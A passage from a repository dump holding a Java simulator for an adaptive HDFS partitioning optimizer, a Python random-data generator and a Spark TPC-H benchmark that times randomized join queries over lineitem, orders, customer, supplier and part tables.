get_comments(access_token, post_user_id, post_id):\n \"\"\"\n get comments from a Facebook post until there are no more comments left\n\n :param access_token: access token to call graph api\n :param post_user_id: facebook user id of the post\n :param post_id: facebook post id\n :return: comments array\n \"\"\"\n\n request_url = 'https://graph.facebook.com/{}/{}_{}/comments?access_token={}'\\\n .format(GRAPH_API_VERSION, post_user_id, post_id, access_token)\n request_obj = requests.get(request_url)\n\n comments = []\n while True:\n request_data = request_obj.json() # parse the JSON response\n\n # if the Graph API returned an error\n if \"error\" in request_data:\n raise Exception(request_data['error']['message'])\n\n for comment in request_data['data']:\n # line break to a single tab\n message = comment['message'].replace('\\n', '\\t')\n comments.append(message)\n\n # more comments?\n if 'paging' in request_data and 'next' in request_data['paging']:\n request_obj = requests.get(request_data['paging']['next'])\n else:\n # return comments when there are no more comments left\n return comments\n" }, { "alpha_fraction": 0.5733944773674011, "alphanum_fraction": 0.6009174585342407, "avg_line_length": 14.533333778381348, "blob_id": "f6ca48bf2a28a7c253ef0d1b51a709d6c7dd95de", "content_id": "6a7707ff0e8bd9f66ddf98a3d3dc304d7e76e1c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 218, "license_type": "no_license", "max_line_length": 60, "num_lines": 15, "path": "/__init__.py", "repo_name": "TaeMinPark/Facebook-Comments-Sentiment-Analyzer", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n__author__ = 'Min'\n\n\"\"\"\n\nfacebook comments sentiment analyzer using Doc2Vec\n\n\n\n\"\"\"\nfrom routes import *\n\n\nif __name__ == '__main__':\n    flask_application.run(host='0.0.0.0') # run application\n" }, { "alpha_fraction": 0.6266433000564575, "alphanum_fraction": 0.6301490068435669, "avg_line_length": 31.628570556640625, "blob_id": "fbe1e9682811490e92349312c2f7e4e92c3dcf24", "content_id": "63f4ce2dccfe1d264716b50cb5a372fe4a3337e3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1141, "license_type": "no_license", "max_line_length": 106, "num_lines": 35, "path": "/routes.py", "repo_name": "TaeMinPark/Facebook-Comments-Sentiment-Analyzer", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n__author__ = 'Min'\n\n\"\"\"\n\nWeb routing using flask framework\n\n\"\"\"\n\nfrom global_objects import flask_application, doc2vec_model\nfrom flask import render_template, request\nfrom comments import get_comments\nfrom doc2vec import analyze_comments\n\n\n@flask_application.route('/', methods=[\"GET\"])\ndef index():\n    return render_template('index.html')\n\n\n@flask_application.route('/analyze', methods=['POST'])\ndef analyze():\n    access_token = request.form['token']\n    post_user_id = request.form['post_user_id']\n    post_id = request.form['post_id']\n\n    comments = get_comments(access_token, post_user_id, post_id)\n    analyze_result = analyze_comments(doc2vec_model, comments)\n\n    return render_template('analyze.html',\n                           positive_count = analyze_result['positive']['count'],\n                           negative_count = analyze_result['negative']['count'],\n                           positive_most_frequent_words = analyze_result['positive']['most_common_words'],\n                           negative_most_frequent_words = analyze_result['negative']['most_common_words']\n                           )" } ]
6
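A minimal end-to-end sketch of how the files in the record above fit together, assuming only the function signatures shown in comments.py, doc2vec.py, and global_objects.py; the access token and post identifiers below are placeholders, not values from the repository:

from comments import get_comments
from doc2vec import load_doc2vec_model, analyze_comments

# Load the pre-trained Doc2Vec model from the path used in global_objects.py.
model = load_doc2vec_model('models/doc2vec.model')

# Placeholder credentials; a real token comes from the Graph API explorer linked in comments.py.
comments = get_comments('ACCESS_TOKEN', 'POST_USER_ID', 'POST_ID')

# Count positive/negative comments and surface the most common tokens per class.
result = analyze_comments(model, comments)
print(result['positive']['count'], result['negative']['count'])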
qinzhewudao/GraduationProject
https://github.com/qinzhewudao/GraduationProject
84c0f34e7022969bdbaa827208f3b70f7e62e1bb
1493cb45f0cc385b1dc0f2075b5db75011fa19cc
1b1b0de15839a189d994d0c0a2d6931289f87a33
refs/heads/master
2020-03-06T21:30:20.614439
2018-03-28T10:35:00
2018-03-28T10:35:00
127,079,028
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6519396305084229, "alphanum_fraction": 0.6526580452919006, "avg_line_length": 31, "blob_id": "753a68dba23fddda6bd0097672a9618e6871c7c4", "content_id": "c00dbc2117a9f1e827804551df244df216f78d8f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2784, "license_type": "no_license", "max_line_length": 84, "num_lines": 87, "path": "/src/main/java/core/simulator/Simulator.java", "repo_name": "qinzhewudao/GraduationProject", "src_encoding": "UTF-8", "text": "package core.simulator;\n\nimport core.adapt.AccessMethod.PartitionSplit;\nimport core.adapt.Query;\nimport core.adapt.iterator.RepartitionIterator;\nimport core.adapt.opt.Optimizer;\nimport core.common.globals.Globals;\nimport core.utils.ConfUtils;\nimport core.utils.CuratorUtils;\nimport core.utils.HDFSUtils;\nimport org.apache.curator.framework.CuratorFramework;\nimport org.apache.hadoop.fs.FileSystem;\n\npublic class Simulator {\n\tOptimizer opt;\n\n\tConfUtils cfg;\n\n\tString simName;\n\n\tString dataset;\n\n\tQuery[] queries;\n\n\tpublic void setUp(ConfUtils cfg, String simName, String dataset, Query[] queries) {\n\t\tthis.cfg = cfg;\n\t\tthis.simName = simName;\n\t\tthis.dataset = dataset;\n\t\tthis.queries = queries;\n\n\t\tFileSystem fs = HDFSUtils.getFSByHadoopHome(cfg.getHADOOP_HOME());\n\n\t\tHDFSUtils.deleteFile(fs,\n\t\t\t\tcfg.getHDFS_WORKING_DIR() + \"/\" + simName, true);\n\t\tHDFSUtils.safeCreateDirectory(fs, cfg.getHDFS_WORKING_DIR() + \"/\" + simName);\n\n\t\tCuratorFramework client = CuratorUtils.createAndStartClient(\n\t\t\t\tcfg.getZOOKEEPER_HOSTS());\n\t\tCuratorUtils.deleteAll(client, \"/\", \"partition-\");\n\t\tCuratorUtils.stopClient(client);\n\n\t\tHDFSUtils.copyFile(fs, cfg.getHDFS_WORKING_DIR() + \"/\" + dataset + \"/\" + \"index\",\n\t\t\t\tcfg.getHDFS_WORKING_DIR() + \"/\" + simName + \"/\" + \"index\",\n\t\t\t\tcfg.getHDFS_REPLICATION_FACTOR());\n\t\tHDFSUtils.copyFile(fs, cfg.getHDFS_WORKING_DIR() + \"/\" + dataset + \"/\" + \"sample\",\n\t\t\t\tcfg.getHDFS_WORKING_DIR() + \"/\" + simName + \"/\" + \"sample\",\n\t\t\t\tcfg.getHDFS_REPLICATION_FACTOR());\n\t\tHDFSUtils.copyFile(fs, cfg.getHDFS_WORKING_DIR() + \"/\" + dataset + \"/\" + \"info\",\n\t\t\t\tcfg.getHDFS_WORKING_DIR() + \"/\" + simName + \"/\" + \"info\",\n\t\t\t\tcfg.getHDFS_REPLICATION_FACTOR());\n\n Globals.loadTableInfo(simName, cfg.getHDFS_WORKING_DIR(), fs);\n\n\t\topt = new Optimizer(cfg);\n\t\topt.loadIndex(Globals.getTableInfo(simName));\n\t}\n\n\tpublic void runOld() {\n\t\tfor (int i=0; i<queries.length; i++) {\n\t\t\tQuery q = queries[i];\n\t\t\tq.setTable(simName);\n PartitionSplit[] splits = opt.buildPlan(q);\n\n // Check if there was an index update. 
If yes, we need\n // to reload the index.\n for (PartitionSplit p: splits) {\n if (p.getIterator().getClass() == RepartitionIterator.class) {\n System.out.println(\"INFO: Reloading index ..\");\n opt.loadIndex(Globals.getTableInfo(simName));\n break;\n }\n }\n\t\t}\n\t}\n\n public void run() {\n\t\tfor (int i=0; i<queries.length; i++) {\n\t\t\tQuery q = queries[i];\n\t\t\tq.setTable(simName);\n PartitionSplit[] splits = opt.buildMultiPredicatePlan(q);\n\n\t\t\t// When using the multi-predicate plan builder, the rt gets dirtied\n\t\t\t// We need to reload for every query.\n opt.loadIndex(Globals.getTableInfo(simName));\n\t\t}\n\t}\n}\n" }, { "alpha_fraction": 0.6158192157745361, "alphanum_fraction": 0.6629002094268799, "avg_line_length": 28.44444465637207, "blob_id": "732ae9d701cb6603c00ded293c1cad77ea905884", "content_id": "b752232593eb481e6222018d2d8a13ecf394127b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 531, "license_type": "no_license", "max_line_length": 96, "num_lines": 18, "path": "/data/gen_simple.py", "repo_name": "qinzhewudao/GraduationProject", "src_encoding": "UTF-8", "text": "\"\"\"\nUsed to generate the simple dataset for testing.\nGenerates a dataset with 1000 tuples, 2 attributes A & B.\nEach attribute takes values randomly from 1 to 1000.\n\"\"\"\n\nimport os\nimport random\n\nif __name__ == \"__main__\":\n dir_path = os.path.dirname(os.path.realpath(__file__))\n os.chdir(dir_path)\n if not os.path.isdir(\"simple\"):\n os.system(\"mkdir simple\")\n\n os.chdir(\"simple\")\n rands = [\"%d|%d\\n\" % (random.randint(1,1000), random.randint(1,1000)) for i in xrange(0,1000)]\n open(\"simple.txt\", \"w\").write(\"\".join(rands))\n\n" }, { "alpha_fraction": 0.6338028311729431, "alphanum_fraction": 0.6338028311729431, "avg_line_length": 9.142857551574707, "blob_id": "5632a3bca2cdd260af4b6978fde9de96d6803c95", "content_id": "6b889e20f2cb71f9705a79d22c44a77d7097c842", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 71, "license_type": "no_license", "max_line_length": 28, "num_lines": 7, "path": "/src/test/java/core/adapt/spark/TPCHQueryTest.java", "repo_name": "qinzhewudao/GraduationProject", "src_encoding": "UTF-8", "text": "package core.adapt.spark;\n\n/**\n * .\n */\npublic class TPCHQueryTest {\n}\n" }, { "alpha_fraction": 0.5169643759727478, "alphanum_fraction": 0.5368112921714783, "avg_line_length": 36.521278381347656, "blob_id": "e6d74870996e7e37f769d3b10a25b5ea18170d5b", "content_id": "8600a55e55dd6bee64c0c3e7ae012a41fd634493", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 21204, "license_type": "no_license", "max_line_length": 134, "num_lines": 564, "path": "/src/main/java/perf/benchmark/TPCHSparkJoinWorkload.java", "repo_name": "qinzhewudao/GraduationProject", "src_encoding": "UTF-8", "text": "package perf.benchmark;\n\nimport core.utils.ConfUtils;\nimport core.utils.TypeUtils.SimpleDate;\nimport org.apache.hadoop.mapred.FileInputFormat;\nimport org.apache.spark.SparkConf;\nimport org.apache.spark.api.java.JavaSparkContext;\nimport org.apache.spark.sql.DataFrame;\nimport org.apache.spark.sql.SQLContext;\n\nimport java.util.Calendar;\nimport java.util.GregorianCalendar;\nimport java.util.Random;\n\n/**\n * Created by ylu on 1/4/16.\n */\n\n\npublic class TPCHSparkJoinWorkload {\n\n private ConfUtils cfg;\n\n private String lineitem = \"lineitem\", orders = \"orders\", customer = \"customer\", 
supplier = \"supplier\", part = \"part\";\n\n private static String[] mktSegmentVals = new\n String[]{\"AUTOMOBILE\", \"BUILDING\", \"FURNITURE\", \"HOUSEHOLD\", \"MACHINERY\"};\n private static String[] regionNameVals = new\n String[]{\"AFRICA\", \"AMERICA\", \"ASIA\", \"EUROPE\", \"MIDDLE EAST\"};\n private static String[] partTypeVals = new\n String[]{\"BRASS\", \"COPPER\", \"NICKEL\", \"STEEL\", \"TIN\"};\n private static String[] shipModeVals = new\n String[]{\"AIR\", \"FOB\", \"MAIL\", \"RAIL\", \"REG AIR\", \"SHIP\", \"TRUCK\"};\n\n\n private int method;\n private int numQueries;\n\n private Random rand;\n\n private JavaSparkContext ctx;\n private SQLContext sqlContext;\n\n public void setUp() {\n cfg = new ConfUtils(BenchmarkSettings.conf);\n rand = new Random();\n // Making things more deterministic.\n rand.setSeed(0);\n\n SparkConf sconf = new SparkConf().setMaster(cfg.getSPARK_MASTER())\n .setAppName(this.getClass().getName())\n .setSparkHome(cfg.getSPARK_HOME())\n .setJars(new String[]{cfg.getSPARK_APPLICATION_JAR()})\n .set(\"spark.hadoop.cloneConf\", \"false\")\n .set(\"spark.executor.memory\", cfg.getSPARK_EXECUTOR_MEMORY())\n .set(\"spark.driver.memory\", cfg.getSPARK_DRIVER_MEMORY())\n .set(\"spark.task.cpus\", cfg.getSPARK_TASK_CPUS());\n\n try {\n sconf.registerKryoClasses(new Class<?>[]{\n Class.forName(\"org.apache.hadoop.io.LongWritable\"),\n Class.forName(\"org.apache.hadoop.io.Text\")\n });\n } catch (ClassNotFoundException e) {\n e.printStackTrace();\n }\n\n ctx = new JavaSparkContext(sconf);\n ctx.hadoopConfiguration().setBoolean(\n FileInputFormat.INPUT_DIR_RECURSIVE, true);\n ctx.hadoopConfiguration().set(\"fs.hdfs.impl\",\n org.apache.hadoop.hdfs.DistributedFileSystem.class.getName());\n\n sqlContext = new SQLContext(ctx);\n\n // Create customer table\n String customerPath = cfg.getHDFS_WORKING_DIR() + \"/\" + customer + \"/data\";\n\n sqlContext.sql(\"CREATE TEMPORARY TABLE customer (c_custkey int, c_name string, c_address string, \"\n + \"c_phone string, c_acctbal double, c_mktsegment string , c_nation string, c_region string) \"\n + \"USING com.databricks.spark.csv \"\n + \"OPTIONS (path \\\"\" + customerPath + \"\\\", header \\\"false\\\", delimiter \\\"|\\\")\");\n\n // Create order table.\n String ordersPath = cfg.getHDFS_WORKING_DIR() + \"/\" + orders + \"/data\";\n\n sqlContext.sql(\"CREATE TEMPORARY TABLE orders (o_orderkey long, o_custkey int, \"\n + \"o_orderstatus string, o_totalprice double, o_orderdate string, \"\n + \"o_orderpriority string, o_clerk string, o_shippriority int) \"\n + \"USING com.databricks.spark.csv \"\n + \"OPTIONS (path \\\"\" + ordersPath + \"\\\", header \\\"false\\\", delimiter \\\"|\\\")\");\n\n\n // Create lineitem table.\n String lineitemPath = cfg.getHDFS_WORKING_DIR() + \"/\" + lineitem + \"/data\";\n\n sqlContext.sql(\"CREATE TEMPORARY TABLE lineitem (l_orderkey long, l_partkey int, l_suppkey int, \"\n + \"l_linenumber int, l_quantity double, l_extendedprice double, l_discount double, \"\n + \"l_tax double, l_returnflag string, l_linestatus string, l_shipdate string, \"\n + \"l_commitdate string, l_receiptdate string, l_shipinstruct string, l_shipmode string) \"\n + \"USING com.databricks.spark.csv \"\n + \"OPTIONS (path \\\"\" + lineitemPath + \"\\\", header \\\"false\\\", delimiter \\\"|\\\")\");\n\n // Create supplier table.\n String supplierPath = cfg.getHDFS_WORKING_DIR() + \"/\" + supplier + \"/data\";\n\n sqlContext.sql(\"CREATE TEMPORARY TABLE supplier (s_suppkey int, s_name string, s_address string, \"\n + 
\"s_phone string, s_acctbal double, s_nation string, s_region string) \"\n + \"USING com.databricks.spark.csv \"\n + \"OPTIONS (path \\\"\" + supplierPath + \"\\\", header \\\"false\\\", delimiter \\\"|\\\")\");\n\n\n\n // Create path table.\n String partPath = cfg.getHDFS_WORKING_DIR() + \"/\" + part + \"/data\";\n\n sqlContext.sql(\"CREATE TEMPORARY TABLE part (p_partkey int, p_name string, p_mfgr string, p_brand string, \"\n + \"p_type string, p_size int, p_container string, p_retailprice double) \"\n + \"USING com.databricks.spark.csv \"\n + \"OPTIONS (path \\\"\" + partPath + \"\\\", header \\\"false\\\", delimiter \\\"|\\\")\");\n\n\n }\n\n\n public void loadSettings(String[] args) {\n int counter = 0;\n while (counter < args.length) {\n switch (args[counter]) {\n case \"--method\":\n method = Integer.parseInt(args[counter + 1]);\n counter += 2;\n break;\n case \"--numQueries\":\n numQueries = Integer.parseInt(args[counter + 1]);\n counter += 2;\n break;\n default:\n // Something we don't use\n counter += 2;\n break;\n }\n }\n }\n\n\n /*\n select\n count(*)\n from\n customer,\n orders,\n lineitem\n where\n c_custkey = o_custkey\n and l_orderkey = o_orderkey\n and c_mktsegment = '[SEGMENT]'\n and o_orderdate < date '[DATE]'\n and l_shipdate > date '[DATE]'\n\n (lineitem ⋈ orders) ⋈ customer\n */\n\n public void tpch3() {\n int rand_3 = rand.nextInt(mktSegmentVals.length);\n String c_mktsegment = mktSegmentVals[rand_3];\n Calendar c = new GregorianCalendar();\n int dateOffset = (int) (rand.nextFloat() * (31 + 28 + 31));\n c.set(1995, Calendar.MARCH, 01);\n c.add(Calendar.DAY_OF_MONTH, dateOffset);\n SimpleDate d3 = new SimpleDate(c.get(Calendar.YEAR),\n c.get(Calendar.MONTH), c.get(Calendar.DAY_OF_MONTH));\n\n String customerPredicate = \"c_mktsegment <= \\\"\" + c_mktsegment + \"\\\"\";\n String ordersPredicate = \"o_orderdate < \\\"\" + d3 + \"\\\"\";\n String lineitemPredicate = \"l_shipdate > \\\"\" + d3 + \"\\\"\";\n\n\n if (rand_3 > 0) {\n String c_mktsegment_prev = mktSegmentVals[rand_3 - 1];\n customerPredicate = \"c_mktsegment > \\\"\" + c_mktsegment_prev + \"\\\" and \" + customerPredicate;\n }\n\n long start = System.currentTimeMillis();\n\n System.out.println(\"SELECT * \"\n + \"FROM lineitem JOIN orders ON l_orderkey = o_orderkey JOIN customer ON o_custkey = c_custkey \"\n + \"WHERE \" + lineitemPredicate + \" and \" + ordersPredicate + \" and \" + customerPredicate);\n\n DataFrame df = sqlContext.sql(\"SELECT * \"\n + \"FROM lineitem JOIN orders ON l_orderkey = o_orderkey JOIN customer ON o_custkey = c_custkey \"\n + \"WHERE \" + lineitemPredicate + \" and \" + ordersPredicate + \" and \" + customerPredicate);\n\n long result = df.count(); // 29569\n System.out.println(\"RES: Time Taken: \" + (System.currentTimeMillis() - start) + \"; Result: \" + result);\n }\n\n /*\n select\n\t count(*)\n from\n customer,\n orders,\n lineitem,\n supplier\n where\n c_custkey = o_custkey\n and l_orderkey = o_orderkey\n and l_suppkey = s_suppkey\n and c_region = '[REGION]'\n and s_region = '[REGION]'\n and o_orderdate >= date '[DATE]'\n and o_orderdate < date '[DATE]' + interval '1' year\n\n ((customer ⋈ orders) ⋈ lineitem) ⋈ supplier\n */\n\n public void tpch5() {\n int rand_5 = rand.nextInt(regionNameVals.length);\n String r_name_5 = regionNameVals[rand_5];\n int year_5 = 1993 + rand.nextInt(5);\n SimpleDate d5_1 = new SimpleDate(year_5, 1, 1);\n SimpleDate d5_2 = new SimpleDate(year_5 + 1, 1, 1);\n\n String customerPredicate = \"c_region <= \\\"\" + r_name_5 + \"\\\"\";\n String 
supplierPredicate = \"s_region <= \\\"\" + r_name_5 + \"\\\"\";\n String ordersPredicate = \"o_orderdate >= \\\"\" + d5_1 + \"\\\" and o_orderdate < \\\"\" + d5_2 + \"\\\"\";\n\n if (rand_5 > 0) {\n String r_name_prev_5 = regionNameVals[rand_5 - 1];\n customerPredicate = \"c_region > \\\"\" + r_name_prev_5 + \"\\\" and \" + customerPredicate;\n supplierPredicate = \"s_region > \\\"\" + r_name_prev_5 + \"\\\" and \" + supplierPredicate;\n }\n\n long start = System.currentTimeMillis();\n\n System.out.println(\"SELECT * \"\n + \"FROM customer JOIN orders ON c_custkey = o_custkey \"\n + \"JOIN lineitem ON l_orderkey = o_orderkey \"\n + \"JOIN supplier ON l_suppkey = s_suppkey \"\n + \"WHERE \" + customerPredicate + \" and \" + ordersPredicate + \" and \" + supplierPredicate);\n\n DataFrame df = sqlContext.sql(\"SELECT * \"\n + \"FROM customer JOIN orders ON c_custkey = o_custkey \"\n + \"JOIN lineitem ON l_orderkey = o_orderkey \"\n + \"JOIN supplier ON l_suppkey = s_suppkey \"\n + \"WHERE \" + customerPredicate + \" and \" + ordersPredicate + \" and \" + supplierPredicate);\n\n long result = df.count(); // 35307\n System.out.println(\"RES: Time Taken: \" + (System.currentTimeMillis() - start) + \"; Result: \" + result);\n }\n\n /*\n select\n count(*)\n from\n lineitem\n where\n l_shipdate >= date '[DATE]'\n and l_shipdate < date '[DATE]' + interval '1' year\n and l_discount between [DISCOUNT] - 0.01 and [DISCOUNT] + 0.01\n and l_quantity < [QUANTITY];\n */\n\n public void tpch6() {\n int year_6 = 1993 + rand.nextInt(5);\n SimpleDate d6_1 = new SimpleDate(year_6, 1, 1);\n SimpleDate d6_2 = new SimpleDate(year_6 + 1, 1, 1);\n double discount = rand.nextDouble() * 0.07 + 0.02;\n double quantity = rand.nextInt(2) + 24.0;\n\n String lineitemPredicate = \"l_shipdate >= \\\"\" + d6_1 + \"\\\" and l_shipdate < \\\"\" + d6_2 + \"\\\" and \"\n + \" l_discount > \" + (discount - 0.01) + \" and l_discount <= \" + (discount + 0.01)\n + \" and l_quantity <= \" + quantity;\n\n long start = System.currentTimeMillis();\n\n System.out.println(\"SELECT * \"\n + \"FROM lineitem \"\n + \"WHERE \" + lineitemPredicate);\n\n DataFrame df = sqlContext.sql(\"SELECT * \"\n + \"FROM lineitem \"\n + \"WHERE \" + lineitemPredicate);\n\n long result = df.count(); // 83063\n System.out.println(\"RES: Time Taken: \" + (System.currentTimeMillis() - start) + \"; Result: \" + result);\n }\n\n\n /*\n select\n count(*)\n from\n part,\n lineitem,\n orders,\n customer\n where\n p_partkey = l_partkey\n and l_orderkey = o_orderkey\n and o_custkey = c_custkey\n and c_region = '[REGION]'\n and o_orderdate between date '1995-01-01' and date '1996-12-31'\n and p_type = '[TYPE]'\n\n ((lineitem ⋈ orders) ⋈ customer) ⋈ part\n */\n\n public void tpch8() {\n int rand_8_1 = rand.nextInt(regionNameVals.length);\n String r_name_8 = regionNameVals[rand_8_1];\n SimpleDate d8_1 = new SimpleDate(1995, 1, 1);\n SimpleDate d8_2 = new SimpleDate(1996, 12, 31);\n String p_type_8 = partTypeVals[rand.nextInt(partTypeVals.length)];\n\n\n String customerPredicate = \"c_region <= \\\"\" + r_name_8 + \"\\\"\";\n String ordersPredicate = \"o_orderdate >= \\\"\" + d8_1 + \"\\\" and o_orderdate < \\\"\" + d8_2 + \"\\\"\";\n String partPredicate = \"p_type = \\\"\" + p_type_8 + \"\\\"\";\n\n\n if (rand_8_1 > 0) {\n String r_name_prev_8 = regionNameVals[rand_8_1 - 1];\n customerPredicate = \"c_region > \\\"\" + r_name_prev_8 + \"\\\" and \" + customerPredicate;\n }\n\n long start = System.currentTimeMillis();\n\n System.out.println(\"SELECT * \"\n + \"FROM 
customer JOIN orders ON c_custkey = o_custkey \"\n + \"JOIN lineitem ON l_orderkey = o_orderkey \"\n + \"JOIN part ON l_partkey = p_partkey \"\n + \"WHERE \" + customerPredicate + \" and \" + ordersPredicate + \" and \" + partPredicate);\n\n DataFrame df = sqlContext.sql(\"SELECT * \"\n + \"FROM customer JOIN orders ON c_custkey = o_custkey \"\n + \"JOIN lineitem ON l_orderkey = o_orderkey \"\n + \"JOIN part ON l_partkey = p_partkey \"\n + \"WHERE \" + customerPredicate + \" and \" + ordersPredicate + \" and \" + partPredicate);\n\n long result = df.count(); // 0\n System.out.println(\"RES: Time Taken: \" + (System.currentTimeMillis() - start) + \"; Result: \" + result);\n }\n\n /*\n select\n count(*)\n from\n orders,\n lineitem,\n customer\n where\n l_orderkey = o_orderkey\n and c_custkey = o_custkey\n and o_orderdate >= date '[DATE]'\n and o_orderdate < date '[DATE]' + interval '3' month\n and l_returnflag = 'R'\n\n (lineitem ⋈ orders) ⋈ customer\n */\n\n\n public void tpch10() {\n String l_returnflag_10 = \"R\";\n String l_returnflag_prev_10 = \"N\";\n int year_10 = 1993;\n int monthOffset = rand.nextInt(24);\n SimpleDate d10_1 = new SimpleDate(year_10 + monthOffset / 12, monthOffset % 12 + 1, 1);\n monthOffset = monthOffset + 3;\n SimpleDate d10_2 = new SimpleDate(year_10 + monthOffset / 12, monthOffset % 12 + 1, 1);\n\n String ordersPredicate = \"o_orderdate >= \\\"\" + d10_1 + \"\\\" and o_orderdate < \\\"\" + d10_2 + \"\\\"\";\n String lineitemPredicate = \"l_returnflag <= \\\"\" + l_returnflag_10 + \"\\\" and l_returnflag > \\\"\" + l_returnflag_prev_10 + \"\\\"\";\n\n long start = System.currentTimeMillis();\n\n System.out.println(\"SELECT * \"\n + \"FROM lineitem JOIN orders ON l_orderkey = o_orderkey \"\n + \"JOIN customer ON c_custkey = o_custkey \"\n + \"WHERE \" + ordersPredicate + \" and \" + lineitemPredicate);\n\n DataFrame df = sqlContext.sql(\"SELECT * \"\n + \"FROM lineitem JOIN orders ON l_orderkey = o_orderkey \"\n + \"JOIN customer ON c_custkey = o_custkey \"\n + \"WHERE \" + ordersPredicate + \" and \" + lineitemPredicate);\n\n long result = df.count(); // 111918\n System.out.println(\"RES: Time Taken: \" + (System.currentTimeMillis() - start) + \"; Result: \" + result);\n }\n\n /*\n select\n count(*)\n from\n orders,\n lineitem\n where\n o_orderkey = l_orderkey\n and l_shipmode in ('[SHIPMODE1]', '[SHIPMODE2]')\n and l_receiptdate >= date '[DATE]'\n and l_receiptdate < date '[DATE]' + interval '1' year\n\n lineitem ⋈ orders\n */\n\n public void tpch12() {\n int rand_12 = rand.nextInt(shipModeVals.length);\n String shipmode_12 = shipModeVals[rand_12];\n int year_12 = 1993 + rand.nextInt(5);\n SimpleDate d12_1 = new SimpleDate(year_12, 1, 1);\n SimpleDate d12_2 = new SimpleDate(year_12 + 1, 1, 1);\n\n String lineitemPredicate = \"l_shipmode <= \\\"\" + shipmode_12 + \"\\\" and l_receiptdate >= \\\"\" + d12_1 + \"\\\" and \"\n + \"l_receiptdate < \\\"\" + d12_2 + \"\\\"\";\n\n if (rand_12 > 0) {\n String shipmode_prev_12 = shipModeVals[rand_12 - 1];\n lineitemPredicate = \"l_shipmode > \\\"\" + shipmode_prev_12 + \"\\\" and \" + lineitemPredicate;\n }\n\n long start = System.currentTimeMillis();\n\n System.out.println(\"SELECT * \"\n + \"FROM lineitem JOIN orders ON l_orderkey = o_orderkey \"\n + \"WHERE \" + lineitemPredicate);\n\n DataFrame df = sqlContext.sql(\"SELECT * \"\n + \"FROM lineitem JOIN orders ON l_orderkey = o_orderkey \"\n + \"WHERE \" + lineitemPredicate);\n\n long result = df.count(); // 130474\n System.out.println(\"RES: Time Taken: \" + 
(System.currentTimeMillis() - start) + \"; Result: \" + result);\n }\n\n /*\n select\n count(*)\n from\n lineitem,\n part\n where\n l_partkey = p_partkey\n and l_shipdate >= date '[DATE]'\n and l_shipdate < date '[DATE]' + interval '1' month;\n\n lineitem ⋈ part\n */\n\n public void tpch14() {\n int year_14 = 1993;\n int monthOffset_14 = rand.nextInt(60);\n SimpleDate d14_1 = new SimpleDate(year_14 + monthOffset_14 / 12, monthOffset_14 % 12 + 1, 1);\n monthOffset_14 += 1;\n SimpleDate d14_2 = new SimpleDate(year_14 + monthOffset_14 / 12, monthOffset_14 % 12 + 1, 1);\n\n String lineitemPredicate = \"l_shipdate >= \\\"\" + d14_1 + \"\\\" and l_shipdate < \\\"\" + d14_2 + \"\\\"\";\n\n long start = System.currentTimeMillis();\n\n System.out.println(\"SELECT * \"\n + \"FROM lineitem JOIN part ON l_partkey = p_partkey \"\n + \"WHERE \" + lineitemPredicate);\n\n DataFrame df = sqlContext.sql(\"SELECT * \"\n + \"FROM lineitem JOIN part ON l_partkey = p_partkey \"\n + \"WHERE \" + lineitemPredicate);\n\n long result = df.count(); // 76860\n System.out.println(\"RES: Time Taken: \" + (System.currentTimeMillis() - start) + \"; Result: \" + result);\n }\n\n /*\n select\n count(*)\n from\n lineitem,\n part\n where\n p_partkey = l_partkey\n and l_shipinstruct = ‘DELIVER IN PERSON’\n and p_brand = ‘[BRAND]’\n and p_container = ‘SM CASE’\n and l_quantity >= [QUANTITY]\n and l_quantity <= [QUANTITY] + 10\n and p_size between 1 and 5\n and l_shipmode <= ‘AIR REG’\n\n lineitem ⋈ part\n */\n\n public void tpch19() {\n String brand_19 = \"Brand#\" + (rand.nextInt(5) + 1) + \"\" + (rand.nextInt(5) + 1);\n String shipInstruct_19 = \"DELIVER IN PERSON\";\n double quantity_19 = rand.nextInt(10) + 1;\n\n String lineitemPredicate = \"l_shipinstruct = \\\"\" + shipInstruct_19 + \"\\\" and l_quantity > \" + quantity_19;\n String partPredicate = \"p_brand = \\\"\" + brand_19 + \"\\\" and p_container = \\\"SM CASE\\\"\";\n quantity_19 += 10;\n\n lineitemPredicate = lineitemPredicate + \" and l_quantity <= \" + quantity_19 + \" and l_shipmode <= \\\"AIR\\\"\";\n partPredicate = partPredicate + \" and p_size >= 1 and p_size <= 5\";\n\n long start = System.currentTimeMillis();\n\n System.out.println(\"SELECT * \"\n + \"FROM lineitem JOIN part ON l_partkey = p_partkey \"\n + \"WHERE \" + lineitemPredicate + \" and \" + partPredicate);\n\n DataFrame df = sqlContext.sql(\"SELECT * \"\n + \"FROM lineitem JOIN part ON l_partkey = p_partkey \"\n + \"WHERE \" + lineitemPredicate + \" and \" + partPredicate);\n\n long result = df.count(); // 10\n System.out.println(\"RES: Time Taken: \" + (System.currentTimeMillis() - start) + \"; Result: \" + result);\n }\n\n public void runWorkload() {\n System.out.println(\"Run TPCH-3\");\n rand.setSeed(0);\n tpch3();\n System.out.println(\"Run TPCH-5\");\n rand.setSeed(0);\n tpch5();\n System.out.println(\"Run TPCH-6\");\n rand.setSeed(0);\n tpch6();\n System.out.println(\"Run TPCH-8\");\n rand.setSeed(0);\n tpch8();\n System.out.println(\"Run TPCH-10\");\n rand.setSeed(0);\n tpch10();\n System.out.println(\"Run TPCH-12\");\n rand.setSeed(0);\n tpch12();\n System.out.println(\"Run TPCH-14\");\n rand.setSeed(0);\n tpch14();\n System.out.println(\"Run TPCH-19\");\n rand.setSeed(0);\n tpch19();\n }\n\n public static void main(String[] args) {\n\n BenchmarkSettings.loadSettings(args);\n BenchmarkSettings.printSettings();\n\n TPCHSparkJoinWorkload t = new TPCHSparkJoinWorkload();\n t.loadSettings(args);\n t.setUp();\n\n switch (t.method) {\n case 1:\n t.runWorkload();\n break;\n\n default:\n 
